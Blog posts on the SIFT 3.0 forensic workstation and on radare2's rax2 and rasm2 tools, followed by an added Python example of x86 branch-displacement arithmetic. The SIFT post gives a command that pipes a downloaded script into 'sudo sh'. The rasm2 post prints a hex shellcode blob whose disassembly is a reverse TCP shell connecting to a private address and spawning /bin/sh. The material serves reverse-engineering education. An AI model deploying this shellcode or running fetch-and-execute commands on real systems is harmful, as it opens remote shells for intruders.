Sunday, March 23, 2014

SIFT Workstation 3.0 has been released

SANS released the new, improved version of the SANS Investigative Forensic Toolkit (SIFT) workstation.

Key new features of SIFT 3.0 include:

Ubuntu LTS 12.04 Base
64 bit base system
Better memory utilization
Auto-DFIR package update and customizations
Latest forensic tools and techniques
VMware Appliance ready to tackle forensics
Cross compatibility between Linux and Windows
Option to install stand-alone via (.iso) or use via VMware Player/Workstation
Online Documentation Project at http://sift.readthedocs.org/
Expanded Filesystem Support

http://digital-forensics.sans.org/community/downloads

update:

You can also install it on your own. Download and install Ubuntu 12.04 LTS, then run the following command:

wget --quiet -O - https://raw.github.com/sans-dfir/sift-bootstrap/master/bootstrap.sh | sudo sh -s -- -i -s -y

This will install SIFT on top of the OS.

Sunday, March 16, 2014

radare2 reverse engineering framework: rax2

The rax2 utility ships with the radare2 framework. It is a simple conversion utility that converts between binary, decimal, hex, strings, etc. The help menu gives an example for each option:

root@kali:~# rax2 -h
Usage: rax2 [options] [expression]
  int   ->  hex           ;  rax2 10
  hex   ->  int           ;  rax2 0xa
  -int  ->  hex           ;  rax2 -77
  -hex  ->  int           ;  rax2 0xffffffb3
  int   ->  bin           ;  rax2 b30
  bin   ->  int           ;  rax2 1010d
  float ->  hex           ;  rax2 3.33f
  hex   ->  float         ;  rax2 Fx40551ed8
  oct   ->  hex           ;  rax2 35o
  hex   ->  oct           ;  rax2 Ox12 (O is a letter)
  bin   ->  hex           ;  rax2 1100011b
  hex   ->  bin           ;  rax2 Bx63
  -e    swap endianness   ;  rax2 -e 0x33
  -b    binstr -> bin     ;  rax2 -b 01000101 01110110
  -s    hexstr -> bin     ;  rax2 -s 43 4a 50
  -S    bin -> hexstr     ;  rax2 -S C  J  P
  -v    version           ;  rax2 -V
  -x    hash string       ;  rax2 -x linux osx
  -k    keep base         ;  rax2 -k 33+3 -> 36
  -h    help              ;  rax2 -h


E.g.:

root@kali:~# rax2 0x33
51
root@kali:~# rax2 Fx33
51.000000f
root@kali:~# rax2 -b 01000101 01110110
Ev

root@kali:~# rax2 -s 43 4a 50
CJP

root@kali:~#

radare2 reverse engineering framework: rasm2

radare, and its successor radare2, is an open source reverse engineering framework, which can be found here:

http://radare.org/y/

It includes quite a few tools, and the website has excellent documentation. In this post I want to review the rasm2 assembler/disassembler utility, one of the main tools in the package. It can work on hex streams, files, opcodes, etc., and has quite a few options, as we can see from the help:

root@kali:~# rasm2 -h
rasm2 [-e] [-o offset] [-a arch] [-s syntax] -d "opcode"|"hexpairs"|- [-f file ..]
 -d           Disassemble from hexpair bytes
 -D           Disassemble showing hexpair and opcode
 -f           Read data from file
 -F [in:out]  Specify input and/or output filters (att2intel, x86.pseudo, ...)
 -o [offset]  Set start address for code (0x08048000)
 -a [arch]    Set architecture plugin
 -b [bits]    Set architecture bits
 -s [syntax]  Select syntax (intel, att)
 -B           Binary input/output (-l is mandatory for binary input)
 -l [int]     Input/Output length
 -C           Output in C format
 -L           List supported asm plugins
 -e           Use big endian
 -v           Show version information
 If '-l' value is greater than output length, output is padded with nops
 If the last argument is '-' reads from stdin

Here are just a few random disassembly examples:

root@kali:~# rasm2 -d 90
nop
root@kali:~# rasm2 -d 53
push ebx
root@kali:~# rasm2 -d 44
inc esp


We can also go the other way and assemble:

root@kali:~# rasm2 "nop"
90
root@kali:~# rasm2 "nop;inc esp;push ebx"
904453


It supports quite a few architectures (the leftmost column shows whether each plugin can assemble, disassemble, or both):

root@kali:~# rasm2 -L
ad  arm       ARM disassembly plugin
ad  armthumb  ARM THUMB disassembly plugin
_d  avr       AVR Atmel disassembler
ad  bf        Brainfuck disassembly plugin
_d  csr       CSR disassembly plugin
ad  dalvik    Dalvik (Android VM) disassembly plugin
ad  java      Java CLASS assembler/disassembler
_d  mips      MIPS disassembly plugin
_d  msil      MSIL disassembly plugin
_d  ppc       PPC disassembly plugin
_d  sh        SH-4 disassembly plugin
_d  sparc     SPARC disassembly plugin
_d  x86       udis86 disassembly plugin
a_  x86.nz    x86 assembler with non-zeros
ad  x86.olly  X86 disassembly plugin (olly engine)


It's very useful for shellcode analysis. I took the following as an example:


Although the assembly is available on the site, rasm2 can also show it nicely:

root@kali:~# rasm2 -d 31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268c0a8010a66687a696653fec389e16a10515689e1cd8031c9b103fec9b03fcd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0x66
mov bl, 0x1
push ecx
push 0x6
push 0x1
push 0x2
mov ecx, esp
int 0x80
mov esi, eax
mov al, 0x66
xor ebx, ebx
mov bl, 0x2
push dword 0xa01a8c0
push word 0x697a
push bx
inc bl
mov ecx, esp
push 0x10
push ecx
push esi
mov ecx, esp
int 0x80
xor ecx, ecx
mov cl, 0x3
dec cl
mov al, 0x3f
int 0x80
jnz 0x804803a
xor eax, eax
push edx
push dword 0x68732f6e
push dword 0x69622f2f
mov ebx, esp
push edx
push ebx
mov ecx, esp
push edx
mov edx, esp
mov al, 0xb
int 0x80


We can also specify an offset if we know where the given instruction will be in memory:

root@kali:~# rasm2 -o 0x8048060 "call 0x09080706"
e8a1860301
root@kali:~# rasm2 -o 0x8048060 -d e8a1860301
call dword 0x9080706
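The reason -o changes the bytes is that x86 CALL and Jcc store a displacement relative to the end of the instruction, not an absolute address. The following Python is an added example (not radare2 code and not from the original post) that reproduces the e8a1860301 encoding above and resolves the jnz 0x804803a seen in the shellcode listing from rasm2's default base of 0x08048000; the function names are my own.

```python
import struct

# Added example: the displacement arithmetic behind rasm2's -o flag for x86
# relative branches (CALL rel32, JMP rel32, JMP rel8, Jcc rel8).

def encode_call_rel32(addr: int, target: int) -> str:
    """Encode a near CALL (opcode E8) located at `addr` that lands on `target`.

    The displacement is taken from the address of the *next* instruction
    (addr + 5 for the 5-byte E8 form) and stored as a little-endian 32-bit
    value; masking to 32 bits makes backward calls wrap correctly.
    """
    disp = (target - (addr + 5)) & 0xFFFFFFFF
    return "e8" + struct.pack("<I", disp).hex()


def decode_rel_branch(addr: int, hexpairs: str) -> int:
    """Return the absolute target of the relative branch encoded in `hexpairs`
    when its first byte sits at `addr`.

    Handles E8 (CALL rel32), E9 (JMP rel32), EB (JMP rel8) and the 70..7F
    short conditional jumps (Jcc rel8) such as the jnz in the listing above.
    """
    data = bytes.fromhex(hexpairs)
    opcode = data[0]
    if opcode in (0xE8, 0xE9):
        disp = struct.unpack_from("<i", data, 1)[0]   # signed 32-bit
        length = 5
    elif opcode == 0xEB or 0x70 <= opcode <= 0x7F:
        disp = struct.unpack_from("<b", data, 1)[0]   # signed 8-bit
        length = 2
    else:
        raise ValueError(f"opcode {opcode:#04x} is not a relative branch")
    return (addr + length + disp) & 0xFFFFFFFF


if __name__ == "__main__":
    # Same numbers as the rasm2 session above.
    print(encode_call_rel32(0x8048060, 0x09080706))          # e8a1860301
    print(hex(decode_rel_branch(0x8048060, "e8a1860301")))  # 0x9080706
    # The "75f8" of the jnz sits 64 bytes into the shellcode blob, so at
    # rasm2's default base 0x08048000 it resolves to 0x804803a (the dec cl).
    print(hex(decode_rel_branch(0x08048000 + 64, "75f8")))  # 0x804803a
    # The same two bytes disassembled at another base point elsewhere, which
    # is why -o matters when reading a listing, and why relative branches
    # keep such blobs position-independent.
    print(hex(decode_rel_branch(0x00400000 + 64, "75f8")))  # 0x40003a
```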